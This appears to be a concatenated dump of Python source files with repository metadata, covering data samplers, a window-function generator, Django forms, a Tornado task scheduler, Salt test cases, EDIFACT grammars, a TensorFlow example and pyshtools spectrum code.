def __init__(self, get_frame_arguments: np.ndarray, min_state_index: int = 0) -> None:
self.starts, self.ends = get_valid_starts_and_ends(get_frame_arguments, min_state_index)
def __len__(self) -> int:
return len(self.starts)
def __iter__(self):
indices = np.random.permutation(len(self.starts))
return iter(np.random.randint(self.starts[indices], self.ends[indices]))
class DistributedSceneSampler(Sampler):
def __init__(
self,
get_frame_arguments: np.ndarray,
min_state_index: int = 0,
num_replicas=None,
rank=None,
shuffle=True,
seed=0
) -> None:
if num_replicas is None:
if not dist.is_available():
raise RuntimeError("Requires distributed package to be available")
num_replicas = dist.get_world_size()
if rank is None:
if not dist.is_available():
raise RuntimeError("Requires distributed package to be available")
rank = dist.get_rank()
self.starts, self.ends = get_valid_starts_and_ends(get_frame_arguments, min_state_index)
self.num_replicas = num_replicas
self.rank = rank
self.epoch = 0
self.num_samples = int(math.ceil(len(self.starts) * 1.0 / self.num_replicas))
self.total_size = self.num_samples * self.num_replicas
self.shuffle = shuffle
self.seed = seed
def __iter__(self):
if self.shuffle:
# deterministically shuffle based on epoch and seed
g = torch.Generator()
g.manual_seed(self.seed + self.epoch)
indices = torch.randperm(len(self.starts), generator=g).tolist()
else:
indices = list(range(len(self.starts)))
# add extra samples to make it evenly divisible
indices += indices[:(self.total_size - len(indices))]
assert len(indices) == self.total_size
# subsample
indices = indices[self.rank:self.total_size:self.num_replicas]
assert len(indices) == self.num_samples
return iter(np.random.randint(self.starts[indices], self.ends[indices]))
def __len__(self):
return self.num_samples
def set_epoch(self, epoch):
r"""
Sets the epoch for this sampler. When :attr:`shuffle=True`, this ensures all replicas
use a different random ordering for each epoch. Otherwise, the next iteration of this
sampler will yield the same ordering.
Arguments:
epoch (int): Epoch number.
"""
self.epoch = epoch
| [
"acc1ssnn9terias@gmail.com"
] | acc1ssnn9terias@gmail.com |
51722ce4582e94fa2bcfb5e42f6fbbe0258d6a0f | da3b9260ee5b352c9438a43d155cebedd46e2fc9 | /emlearn/tools/window_function.py | ef59e239eb95e8de7970a2e6a2d284d740b21f6d | [
"MIT"
] | permissive | profjefer/emlearn | 8eadde4d63f8cb2edd1d33a556039b5b08185bf2 | cc5fd962f5af601c02dfe0ec9203d1b30e6b3aef | refs/heads/master | 2023-07-15T02:36:56.072459 | 2021-08-08T09:52:00 | 2021-08-08T09:52:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,315 | py |
"""eml-window-function: Generating C code for window functions
Part of the emlearn project: https://emlearn.org
Redistributable under the MIT license
"""
import argparse
import textwrap
from .. import cgen
# Supports everything without parameters in scipy.signal.get_window
_known = 'boxcar, triang, blackman, hamming, hann, bartlett, flattop, parzen, bohman, blackmanharris, nuttall, barthann'
known_window_types = tuple(_known.split(', '))
def parse(args=None):
parser = argparse.ArgumentParser(description='Generate lookup table for window functions')
a = parser.add_argument
a('--window', type=str, default='hann',
help='Window function to use. Supported: \n' + '|'.join(known_window_types))
a('--length', type=int, default=1024,
help='Number of coefficients in window')
a('--symmetric', default=False, action='store_true',
help='Whether to use a symmetric window. Defaults to False, normal for FFT')
a('--name', type=str, default='',
help='Name of the generate C array')
a('--out', type=str, default='',
help='Output file. Default: $name.h')
a('--linewrap', type=int, default=70,
help='Maximum width of lines')
parsed = parser.parse_args(args)
return parsed
def window_function(name, window_type, length, fft_mode, linewrap):
import scipy.signal
window = scipy.signal.get_window(window_type, length, fftbins=fft_mode)
gen = cgen.array_declare(name, length, values=window)
w = textwrap.wrap(gen, linewrap)
wrapped = '\n'.join(w)
return wrapped
def main():
args = parse()
window_type = args.window
length = args.length
fft_mode = not args.symmetric
name = args.name
out = args.out
if not name:
name = '_'.join([window_type, str(length), 'lut'])
if not out:
out = name+'.h'
if window_type not in known_window_types:
print('Warning: Unknown window type {}. Known:\n {}'.format(window_type, known_window_types))
preamble = '// This file was generated with emlearn using eml-window-function\n\n'
wrapped = window_function(name, window_type, length, fft_mode, args.linewrap)
wrapped = preamble + wrapped
with open(out, 'w') as f:
f.write(wrapped)
print('Wrote to', out)
if __name__ == '__main__':
main()
| [
"jononor@gmail.com"
] | jononor@gmail.com |
4037b86353a2311197e3c0421e50369f7d041340 | 49ba5356bdc5df7dd9803b56fe507c5164a90716 | /utils.py | aab51dd8b4c7a0d60394907fa69bc482cd0d2d7e | [] | no_license | uxlsl/leetcode_practice | d80ad481c9d8ee71cce0f3c66e98446ced149635 | d8ed762d1005975f0de4f07760c9671195621c88 | refs/heads/master | 2021-04-25T18:12:28.136504 | 2020-03-11T07:54:15 | 2020-03-11T07:54:15 | 121,472,384 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py |
class TreeNode(object):
def __init__(self, x, left=None, right=None):
self.val = x
self.left = left
self.right = right
| [
"songlin.lin@yundata.com"
] | songlin.lin@yundata.com |
7a5a5eb855c8c133eaf70cae42962096075431d4 | 2fab03dd2bc2b214a1f608e3ddb1990b052fcfd0 | /first_forms/apps/forms/forms.py | 07fa07485b8a1ed4396b54d89357f6cc1dbf3671 | [] | no_license | tlee0058/Django_FORMS | 7f7bdbbdc090f59231c8dd1e4624ff16b7a88890 | 2260b86c3d06fd2a10f867481f9e4a068997fd6a | refs/heads/master | 2020-03-09T07:59:31.055697 | 2018-04-08T21:27:35 | 2018-04-08T21:27:35 | 128,678,384 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 453 | py | from django import forms
from .models import User
class RegistrationForm(forms.Form):
first_name = forms.CharField(max_length=45)
last_name = forms.CharField(max_length=45)
email = forms.EmailField()
password = forms.CharField(max_length=100, widget=forms.PasswordInput)
confirm_password = forms.CharField(max_length=100, widget=forms.PasswordInput)
class RegisterForm(forms.ModelForm):
class Meta:
model = User
fields = '__all__' | [
"tlee0058@gmail.com"
] | tlee0058@gmail.com |
7b1f9660c366b7545b5e9bf7fe81748e3e2d5df8 | 4760a482ed52eb7f786e6987e55704fcfb33dd18 | /app.py | 15435449c61f34cd0ec135223aadbf9d16a11212 | [] | no_license | zhidu-qidian/scheduler | 18566993df81fb3b211d783aacef0c5b4268d8d6 | 08be2a10eb769ccb2da6d3de17bd19b4c029cd87 | refs/heads/master | 2021-05-15T18:41:15.254984 | 2017-10-20T08:19:31 | 2017-10-20T08:19:31 | 107,651,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,101 | py | # coding: utf-8
from datetime import datetime
import logging
import sys
from urllib import quote
from apscheduler.schedulers.tornado import TornadoScheduler
from apscheduler.jobstores.base import JobLookupError
from pymongo import MongoClient
from redis import from_url
from tornado import httpserver
from tornado import ioloop
from tornado import web
from tornado.web import RequestHandler
redis_url = "redis://内网地址:6379"
# redis_url = "redis://127.0.0.1:6379"
redis = from_url(redis_url, db=2, max_connections=10)
MONGODB_HOST_PORT = "内网地址:27017"
MONGODB_PASSWORD = ""
COL_RULES = "timerules"
def get_mongodb_database(database, user="third"):
url = "mongodb://{0}:{1}@{2}/{3}".format(
user, quote(MONGODB_PASSWORD), MONGODB_HOST_PORT, database
)
client = MongoClient(host=url, maxPoolSize=5, minPoolSize=1)
return client.get_default_database()
def task(struct, key, value):
if struct == "set":
redis.sadd(key, value)
elif struct == "list":
redis.rpush(key, value)
def format_trigger(string):
string = string.strip()
if string[0] == "T": # interval
args = dict()
start = 1
for i, c in enumerate(string):
if c == "D":
args["days"] = int(string[start:i])
start = i+1
elif c == "H":
args["hours"] = int(string[start:i])
start = i + 1
elif c == "M":
args["minutes"] = int(string[start:i])
start = i + 1
elif c == "S":
args["seconds"] = int(string[start:i])
start = i + 1
else:
pass
return "interval", args
elif ";" in string: # cron
fields = string.strip().split(";")
args = {
"month": fields[0],
"day": fields[1],
"hour": fields[2],
"minute": fields[3],
"second": fields[4],
}
return "cron", args
else: # date
return "date", {"run_date": datetime.strptime(string, "%Y-%m-%d %H:%M:%S")}
class TaskHandler(RequestHandler):
def get(self, *args, **kwargs):
ids = self.get_arguments("id")
results = {"jobs": list()}
if ids:
for _id in ids:
job = self.application.sdr.get_job(job_id=_id)
if job:
next_time = job.next_run_time.strftime("%Y-%m-%d %H:%M:%S")
results["jobs"].append({"id": job.id, "name": job.name, "next": next_time})
else:
for job in self.application.sdr.get_jobs():
next_time = job.next_run_time.strftime("%Y-%m-%d %H:%M:%S")
results["jobs"].append({"id": job.id, "name": job.name, "next": next_time})
self.write(results)
def post(self, *args, **kwargs):
_id = self.get_argument("id")
rule = self.get_argument("rule")
key = self.get_argument("key")
value = self.get_argument("value")
struct = self.get_argument("struct")
if not (_id or rule or key or value or struct):
self.write({"code": 400, "message": "invalid params"})
else:
trigger, params = format_trigger(rule)
self.application.sdr.add_job(
task,
trigger=trigger,
args=[struct, key, value],
id=_id,
replace_existing=True,
**params
)
data = {"_id": _id, "rule": rule, "key": key, "value": value,
"struct": struct}
if trigger != "date":
self.store(data)
self.write({"code": 200, "message": "add job %s success" % _id})
def delete(self, *args, **kwargs):
_id = self.get_argument("id")
try:
self.application.sdr.remove_job(job_id=_id)
self.remove(_id)
self.write({"code": 200, "message": "remove job %s success" % _id})
except JobLookupError:
self.write({"code": 404, "message": "no such job:%s" % _id})
def store(self, data):
col = self.application.db[COL_RULES]
query = {"_id": data["_id"]}
if col.count(query):
col.delete_one(query)
data["time"] = datetime.now()
col.insert_one(data)
def remove(self, _id):
col = self.application.db[COL_RULES]
query = {"_id": _id}
col.delete_one(query)
class Application(web.Application):
def __init__(self):
handlers = [
("/tasks", TaskHandler),
]
defaults = {
"coalesce": True,
"max_instances": 5,
"misfire_grace_time": 120,
"replace_existing": True
}
scheduler = TornadoScheduler(job_defaults=defaults)
scheduler.start()
self.sdr = scheduler
self.db = get_mongodb_database("thirdparty", "third")
init_schedule_task(scheduler, self.db)
web.Application.__init__(self, handlers=handlers)
def init_schedule_task(scheduler, db):
col = db[COL_RULES]
rules = col.find({})
for rule in rules:
trigger, params = format_trigger(rule["rule"])
scheduler.add_job(
task,
trigger=trigger,
args=[rule["struct"], rule["key"], rule["value"]],
id=rule["_id"],
replace_existing=True,
**params
)
logging.info("add %s job rule %s" % (rule["_id"], rule["rule"]))
def main():
http_server = httpserver.HTTPServer(Application())
address = sys.argv[1]
address = address.split(":")
host = address[0]
port = address[1]
http_server.listen(port=port, address=host)
ioloop.IOLoop.instance().start()
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO,
format="%(asctime)s %(levelname)s %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
filename="log-app.log",
filemode="a+")
main()
| [
"xinyong.wang@qq.com"
] | xinyong.wang@qq.com |
ff315fba136d0af80f9ab92d97c8f7dcd05df541 | 35d16f57feae5fbb29237992590981b324bfe10b | /tests/functional/factories/daemons/test_master_factory.py | c3d1ab277613668aad13b73a7dbf685f1ef2f4b9 | [
"Apache-2.0"
] | permissive | modamod/pytest-salt-factories | 592c477564534c196744f8445c5b62d97190af8e | 4bc885d60ec3f58d0c84283276ba1c99e6c30ba1 | refs/heads/master | 2023-02-13T15:32:34.123167 | 2021-01-19T06:15:33 | 2021-01-19T06:15:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,060 | py | import pytest
from saltfactories.utils import random_string
from saltfactories.utils import running_username
def test_keyword_basic_config_defaults(salt_factories):
master_config = salt_factories.get_salt_master_daemon(
random_string("master-"), config_defaults={"zzzz": True}
).config
assert "zzzz" in master_config
def test_interface_config_defaults(salt_factories):
interface = "172.17.0.1"
master_config = salt_factories.get_salt_master_daemon(
random_string("master-"), config_defaults={"interface": interface}
).config
assert master_config["interface"] != interface
assert master_config["interface"] == "127.0.0.1"
def test_keyword_basic_config_overrides(salt_factories):
master_config = salt_factories.get_salt_master_daemon(
random_string("master-"), config_overrides={"zzzz": True}
).config
assert "zzzz" in master_config
def test_interface_config_overrides(salt_factories):
interface = "172.17.0.1"
master_config = salt_factories.get_salt_master_daemon(
random_string("master-"), config_overrides={"interface": interface}
).config
assert master_config["interface"] != "127.0.0.1"
assert master_config["interface"] == interface
def test_keyword_simple_overrides_override_defaults(salt_factories):
master_config = salt_factories.get_salt_master_daemon(
random_string("master-"), config_defaults={"zzzz": False}, config_overrides={"zzzz": True}
).config
assert "zzzz" in master_config
assert master_config["zzzz"] is True
def test_keyword_nested_overrides_override_defaults(salt_factories):
master_config = salt_factories.get_salt_master_daemon(
random_string("master-"),
config_defaults={
"zzzz": False,
"user": "foobar",
"colors": {"black": True, "white": False},
},
config_overrides={"colors": {"white": True, "grey": False}},
).config
assert "zzzz" in master_config
assert master_config["zzzz"] is False
assert master_config["colors"] == {"black": True, "white": True, "grey": False}
def test_provide_root_dir(testdir, salt_factories):
root_dir = testdir.mkdir("custom-root")
config_defaults = {"root_dir": root_dir}
master_config = salt_factories.get_salt_master_daemon(
random_string("master-"), config_defaults=config_defaults
).config
assert master_config["root_dir"] == root_dir
def configure_kwargs_ids(value):
return "configure_kwargs={!r}".format(value)
@pytest.mark.parametrize(
"configure_kwargs",
[{"config_defaults": {"user": "blah"}}, {"config_overrides": {"user": "blah"}}, {}],
ids=configure_kwargs_ids,
)
def test_provide_user(salt_factories, configure_kwargs):
master_config = salt_factories.get_salt_master_daemon(
random_string("master-"), **configure_kwargs
).config
if not configure_kwargs:
# salt-factories injects the current username
assert master_config["user"] is not None
assert master_config["user"] == running_username()
else:
# salt-factories does not override the passed user value
assert master_config["user"] != running_username()
assert master_config["user"] == "blah"
@pytest.mark.parametrize(
"configure_kwargs",
[
{"config_defaults": None},
{"config_overrides": None},
{},
{"config_defaults": None, "config_overrides": {"user": "blah"}},
{"config_defaults": {"user": "blah"}, "config_overrides": None},
{"config_defaults": {"user": "blah"}, "config_overrides": {"user": "blah"}},
],
ids=configure_kwargs_ids,
)
def test_pytest_config(salt_factories, configure_kwargs):
master_id = random_string("master-")
config = salt_factories.get_salt_master_daemon(master_id, **configure_kwargs).config
config_key = "pytest-master"
assert config_key in config
assert "log" in config[config_key]
for key in ("host", "level", "port", "prefix"):
assert key in config[config_key]["log"]
| [
"pedro@algarvio.me"
] | pedro@algarvio.me |
0dbd426f8b5f12dbc8f3d582a2e24f5700f8f1b1 | f445450ac693b466ca20b42f1ac82071d32dd991 | /generated_tempdir_2019_09_15_163300/generated_part005965.py | 190e8d7a975427451853e01e989a121bf4b152c5 | [] | no_license | Upabjojr/rubi_generated | 76e43cbafe70b4e1516fb761cabd9e5257691374 | cd35e9e51722b04fb159ada3d5811d62a423e429 | refs/heads/master | 2020-07-25T17:26:19.227918 | 2019-09-15T15:41:48 | 2019-09-15T15:41:48 | 208,357,412 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,302 | py | from sympy.abc import *
from matchpy.matching.many_to_one import CommutativeMatcher
from matchpy import *
from matchpy.utils import VariableWithCount
from collections import deque
from multiset import Multiset
from sympy.integrals.rubi.constraints import *
from sympy.integrals.rubi.utility_function import *
from sympy.integrals.rubi.rules.miscellaneous_integration import *
from sympy import *
class CommutativeMatcher141996(CommutativeMatcher):
_instance = None
patterns = {
0: (0, Multiset({}), [
(VariableWithCount('i2.3.3.1.0', 1, 1, None), Mul),
(VariableWithCount('i2.3.3.1.0_1', 1, 1, S(1)), Mul)
])
}
subjects = {}
subjects_by_id = {}
bipartite = BipartiteGraph()
associative = Mul
max_optional_count = 1
anonymous_patterns = set()
def __init__(self):
self.add_subject(None)
@staticmethod
def get():
if CommutativeMatcher141996._instance is None:
CommutativeMatcher141996._instance = CommutativeMatcher141996()
return CommutativeMatcher141996._instance
@staticmethod
def get_match_iter(subject):
subjects = deque([subject]) if subject is not None else deque()
subst0 = Substitution()
# State 141995
return
yield
from collections import deque | [
"franz.bonazzi@gmail.com"
] | franz.bonazzi@gmail.com |
f05aad2d52815971fbc0b159d3996d831cefae17 | 2e3fd7f4d78847fbd713f521587fe39116fa34a0 | /glue/managers/simple.py | b7bf5644c754f60f1c85d25068b9074bab0f536c | [
"BSD-2-Clause"
] | permissive | jkenlooper/glue | 24e3da4a94ec34632391f8ce93826cce3c347a57 | 8d2788fce4e23c314b2428831d34f89cdbeb2a9c | refs/heads/master | 2021-09-09T10:52:56.701113 | 2021-04-10T12:37:53 | 2021-04-10T12:37:53 | 181,468,692 | 0 | 0 | NOASSERTION | 2019-04-15T10:58:51 | 2019-04-15T10:58:51 | null | UTF-8 | Python | false | false | 330 | py | from .base import BaseManager
class SimpleManager(BaseManager):
"""Process a single folder and create one sprite. It works the
same way as :class:`~ProjectSpriteManager`, but only for one folder.
This is the default manager.
"""
def find_sprites(self):
self.add_sprite(path=self.config['source'])
| [
"me@jorgebastida.com"
] | me@jorgebastida.com |
c976055f913211d6c572da188dd343620dd1777c | 62e58c051128baef9452e7e0eb0b5a83367add26 | /edifact/D11A/COLREQD11AUN.py | 43c7ae15b28a1c63211d543e79f5399cf0ce7c28 | [] | no_license | dougvanhorn/bots-grammars | 2eb6c0a6b5231c14a6faf194b932aa614809076c | 09db18d9d9bd9d92cefbf00f1c0de1c590fe3d0d | refs/heads/master | 2021-05-16T12:55:58.022904 | 2019-05-17T15:22:23 | 2019-05-17T15:22:23 | 105,274,633 | 0 | 0 | null | 2017-09-29T13:21:21 | 2017-09-29T13:21:21 | null | UTF-8 | Python | false | false | 1,421 | py | #Generated by bots open source edi translator from UN-docs.
from bots.botsconfig import *
from edifact import syntax
from recordsD11AUN import recorddefs
structure = [
{ID: 'UNH', MIN: 1, MAX: 1, LEVEL: [
{ID: 'BGM', MIN: 1, MAX: 1},
{ID: 'DTM', MIN: 0, MAX: 1},
{ID: 'FCA', MIN: 1, MAX: 1},
{ID: 'DOC', MIN: 1, MAX: 40},
{ID: 'INP', MIN: 0, MAX: 20},
{ID: 'FTX', MIN: 0, MAX: 15},
{ID: 'FII', MIN: 1, MAX: 7, LEVEL: [
{ID: 'RFF', MIN: 0, MAX: 1},
{ID: 'CTA', MIN: 0, MAX: 1},
{ID: 'COM', MIN: 0, MAX: 5},
]},
{ID: 'NAD', MIN: 1, MAX: 9, LEVEL: [
{ID: 'RFF', MIN: 0, MAX: 3},
{ID: 'CTA', MIN: 0, MAX: 1},
{ID: 'COM', MIN: 0, MAX: 5},
]},
{ID: 'PYT', MIN: 1, MAX: 1, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 1},
{ID: 'FTX', MIN: 0, MAX: 1},
]},
{ID: 'MOA', MIN: 1, MAX: 5, LEVEL: [
{ID: 'FTX', MIN: 0, MAX: 1},
]},
{ID: 'TDT', MIN: 0, MAX: 1, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 1},
{ID: 'LOC', MIN: 0, MAX: 3},
]},
{ID: 'GEI', MIN: 0, MAX: 10, LEVEL: [
{ID: 'MOA', MIN: 0, MAX: 1},
{ID: 'LOC', MIN: 0, MAX: 2},
{ID: 'NAD', MIN: 0, MAX: 1},
{ID: 'RCS', MIN: 0, MAX: 1},
{ID: 'FTX', MIN: 0, MAX: 10},
]},
{ID: 'AUT', MIN: 0, MAX: 1, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 1},
]},
{ID: 'UNT', MIN: 1, MAX: 1},
]},
]
| [
"jason.capriotti@gmail.com"
] | jason.capriotti@gmail.com |
732aa5dde56b43bc0f071270e29ec985954b334e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03346/s258893438.py | 945e31f4eeb13ab37b2dc35c29cda1e50389a8ca | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 690 | py | import sys
input = sys.stdin.readline
import heapq
def read():
N = int(input().strip())
P = []
for i in range(N):
p = int(input().strip())
P.append(p)
return N, P
def solve(N, P):
Q = [0 for i in range(N)]
for i in range(N):
Q[P[i]-1] = i
max_count = 0
count = 0
prev = -1
for i in range(N):
q = Q[i]
if prev < q:
count += 1
prev = q
else:
max_count = max(max_count, count)
count = 1
prev = q
max_count = max(max_count, count)
return N - max_count
if __name__ == '__main__':
inputs = read()
print("%s" % solve(*inputs))
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
18f082ffc446b47fa664e4b53b891ae87ac64a7e | b0b87924d07101e25fa56754ceaa2f22edc10208 | /workspace/DL/DL3-2.py | ae888fd2295b854fffc3b000ca76341442b1ef96 | [] | no_license | SoheeKwak/Python | 2295dd03e5f235315d07355cbe72998f8b86c147 | e1a5f0ecf31e926f2320c5df0e3416306b8ce316 | refs/heads/master | 2020-04-02T13:49:58.367361 | 2018-11-23T09:33:23 | 2018-11-23T09:33:23 | 154,499,204 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 704 | py | import tensorflow as tf
# w와 b에 대한 초기값을 부여한 상태에서 모델링
w=tf.Variable([.3], tf.float32)
b=tf.Variable([-.3], tf.float32)
x=tf.placeholder(tf.float32)
y=tf.placeholder(tf.float32)
lm=x*w+b
loss=tf.reduce_sum(tf.square(lm-y))
train=tf.train.GradientDescentOptimizer(0.01).minimize(loss)
x_train=[1,2,3,4]
y_train=[0,-1,-2,-3]
#트레이닝 횟수 1000번->모델생성
#생성된 모델의 w, b, loss출력
sess=tf.Session()
sess.run(tf.global_variables_initializer())
for i in range(1000):
sess.run(train,feed_dict={x:x_train,y:y_train})
wv, bv, lossv = sess.run([w,b,loss],feed_dict={x:x_train, y:y_train})
print("w값:%s b값:%s loss값:%s" % (wv, bv, lossv))
| [
"soheekwak728@gmail.com"
] | soheekwak728@gmail.com |
4a9a89a9bd4fe83f91578a20cf8ba51411b5e658 | b9b7bf5d82ffc7c972dda803241c3e6247a92002 | /pyshtools/spectralanalysis/spectrum.py | 048b9436736827a5214869cb2a7209fb92ee713e | [
"BSD-3-Clause"
] | permissive | MMesch/SHTOOLS | 9aff298b8075f7d9fad9690ab2053e934197403d | 72bf04fb9b83f17c2dac2a8f252a8634d6f7588a | refs/heads/master | 2021-01-24T20:02:42.911226 | 2017-12-25T22:35:00 | 2017-12-25T22:35:00 | 26,169,620 | 1 | 0 | null | 2016-08-29T11:57:46 | 2014-11-04T13:22:14 | null | UTF-8 | Python | false | false | 4,810 | py | import numpy as _np
def spectrum(clm, normalization='4pi', degrees=None, lmax=None,
convention='power', unit='per_l', base=10.):
"""
Return the spectrum of the spherical harmonic coefficients as a function
of spherical harmonic degree.
Usage
-----
array = spectrum(clm, [normalization, degrees, lmax, convention,
unit, base])
Returns
-------
array : ndarray, shape (len(degrees))
1-D ndarray of the spectrum.
Parameters
----------
clm : ndarray, shape (2, lmax + 1, lmax + 1)
ndarray containing the spherical harmonic coefficients.
normalization : str, optional, default = '4pi'
'4pi', 'ortho' or 'schmidt' for geodesy 4pi normalized,
orthonormalized, or Schmidt semi-normalized coefficients, respectively.
lmax : int, optional, default = len(clm[0,:,0]) - 1.
Maximum spherical harmonic degree to output.
degrees : ndarray, optional, default = numpy.arange(lmax+1)
Array containing the spherical harmonic degrees where the spectrum
is computed.
convention : str, optional, default = 'power'
The type of spectrum to return: 'power' for power spectrum, 'energy'
for energy spectrum, and 'l2norm' for the l2 norm spectrum.
unit : str, optional, default = 'per_l'
If 'per_l', return the total contribution to the spectrum for each
spherical harmonic degree l. If 'per_lm', return the average
contribution to the spectrum for each coefficient at spherical
harmonic degree l. If 'per_dlogl', return the spectrum per log
interval dlog_a(l).
base : float, optional, default = 10.
The logarithm base when calculating the 'per_dlogl' spectrum.
Description
-----------
This function returns either the power spectrum, energy spectrum, or
l2-norm spectrum. Total power is defined as the integral of the
function squared over all space, divided by the area the function
spans. If the mean of the function is zero, this is equivalent to the
variance of the function. The total energy is the integral of the
function squared over all space and is 4pi times the total power. The
l2-norm is the sum of the magnitude of the coefficients squared.
The output spectrum can be expresed using one of three units. 'per_l'
returns the contribution to the total spectrum from all angular orders
at degree l. 'per_lm' returns the average contribution to the total
spectrum from a single coefficient at degree l. The 'per_lm' spectrum
is equal to the 'per_l' spectrum divided by (2l+1). 'per_dlogl' returns
the contribution to the total spectrum from all angular orders over an
infinitessimal logarithmic degree band. The contrubution in the band
dlog_a(l) is spectrum(l, 'per_dlogl')*dlog_a(l), where a is the base,
and where spectrum(l, 'per_dlogl) is equal to
spectrum(l, 'per_l')*l*log(a).
"""
if lmax is None:
lmax = len(clm[0, :, 0]) - 1
if (degrees is None):
degrees = _np.arange(lmax+1)
ndegrees = len(degrees)
array = _np.empty(ndegrees)
# First compute l2norm, and then convert to the required normalization
if _np.iscomplexobj(clm):
for i, l in enumerate(degrees):
array[i] = (clm[0, l, 0:l + 1] *
clm[0, l, 0:l + 1].conjugate()).real.sum() + \
(clm[1, l, 1:l + 1] *
clm[1, l, 1:l + 1].conjugate()).real.sum()
else:
for i, l in enumerate(degrees):
array[i] = (clm[0, l, 0:l+1]**2).sum() \
+ (clm[1, l, 1:l+1]**2).sum()
if convention.lower() == 'l2norm':
pass
elif convention.lower() in ('power', 'energy'):
if normalization == '4pi':
pass
elif normalization == 'schmidt':
array /= (2.0 * degrees + 1.0)
elif normalization == 'ortho':
array /= (4.0 * _np.pi)
else:
raise ValueError(
"normalization must be '4pi', 'ortho', or 'schmidt'. " +
"Input value was {:s}".format(repr(normalization)))
else:
raise ValueError(
"convention must be 'power', 'energy', or 'l2norm'. " +
"Input value was {:s}".format(repr(convention)))
if convention.lower() == 'energy':
array *= 4.0 * _np.pi
if unit.lower() == 'per_l':
pass
elif unit.lower() == 'per_lm':
array /= (2.0 * degrees + 1.0)
elif unit.lower() == 'per_dlogl':
array *= degrees * _np.log(base)
else:
raise ValueError(
"unit must be 'per_l', 'per_lm', or 'per_dlogl'." +
"Input value was {:s}".format(repr(unit)))
return array
| [
"mark.a.wieczorek@gmail.com"
] | mark.a.wieczorek@gmail.com |
967d0339908521e033f2e7ab5123aaae8a304dc1 | 4b8b0be0588f9e5249729f165b72a6b38324837d | /setup.py | fe4f9c413e1a971588bfa6a67604b75d511472a3 | [] | no_license | GlycReSoft2/embed_tandem_ms_classifier | 5e2f569f2b74f2f14f1c1c0cede32de99c150890 | 0495f2234562a9c5dd02d545800c077df2305387 | refs/heads/master | 2020-06-02T09:32:55.457664 | 2015-06-20T21:30:19 | 2015-06-20T21:30:19 | 22,615,207 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,718 | py | import sys
from setuptools import setup, find_packages, Extension
# With gratitude to the SqlAlchemy setup.py authors
from distutils.command.build_ext import build_ext
from distutils.errors import (CCompilerError, DistutilsExecError,
DistutilsPlatformError)
ext_errors = (CCompilerError, DistutilsExecError, DistutilsPlatformError)
if sys.platform == 'win32':
# 2.6's distutils.msvc9compiler can raise an IOError when failing to
# find the compiler
ext_errors += (IOError,)
c_ext = "pyx"
try:
from Cython.Build import cythonize
except:
c_ext = "c"
extensions = [
Extension("glycresoft_ms2_classification.utils.cmass_heap",
["glycresoft_ms2_classification/utils/cmass_heap." + c_ext]),
Extension("glycresoft_ms2_classification.ms.ion_matching",
["glycresoft_ms2_classification/ms/ion_matching." + c_ext]),
Extension("glycresoft_ms2_classification.structure.composition.ccomposition",
["glycresoft_ms2_classification/structure/composition/ccomposition." + c_ext])
]
if c_ext == "pyx":
extensions = cythonize(extensions, annotate=True)
cmdclass = {}
class BuildFailed(Exception):
def __init__(self):
self.cause = sys.exc_info()[1] # work around py 2/3 different syntax
def __str__(self):
return str(self.cause)
class ve_build_ext(build_ext):
# This class allows C extension building to fail.
def run(self):
try:
build_ext.run(self)
except DistutilsPlatformError:
raise BuildFailed()
def build_extension(self, ext):
try:
build_ext.build_extension(self, ext)
except ext_errors:
raise BuildFailed()
except ValueError:
# this can happen on Windows 64 bit, see Python issue 7511
if "'path'" in str(sys.exc_info()[1]): # works with both py 2/3
raise BuildFailed()
raise
cmdclass['build_ext'] = ve_build_ext
def status_msgs(*msgs):
print('*' * 75)
for msg in msgs:
print(msg)
print('*' * 75)
def run_setup(include_cext=True):
setup(
name="GlycReSoft",
version="1.0.2",
packages=find_packages(),
install_requires=[
"scikit-learn >= 0.14.1",
"pandas >= 0.14.0",
"pyyaml >= 3.11",
"pyteomics >= 2.5",
"sqlitedict >= 1.1.0",
"numexpr >= 2.1",
"xray >= 0.3.2"
],
cmdclass=cmdclass,
zip_safe=False,
include_package_data=True,
package_data={
'glycresoft_ms2_classification': ["*.csv", "*.xml", "*.json", "data/*.csv"],
'glycresoft_ms2_classification.structure': ["structure/data/*.csv", "structure/data/*.json"]
},
ext_modules=extensions if include_cext else None,
entry_points={
'console_scripts': [
"glycresoft-ms2 = glycresoft_ms2_classification.__main__:main",
],
'setuptools.installation': [
"eggsecutable = glycresoft_ms2_classification.__main__:main"
]
},
namespace_packages=["glycresoft_ms2_classification"]
)
try:
run_setup(True)
except Exception as exc:
status_msgs(
str(exc),
"WARNING: The C extension could not be compiled, " +
"speedups are not enabled.",
"Failure information, if any, is above.",
"Retrying the build without the C extension now."
)
run_setup(False)
status_msgs(
"WARNING: The C extension could not be compiled, " +
"speedups are not enabled.",
"Plain-Python build succeeded."
)
| [
"mobiusklein@gmail.com"
] | mobiusklein@gmail.com |
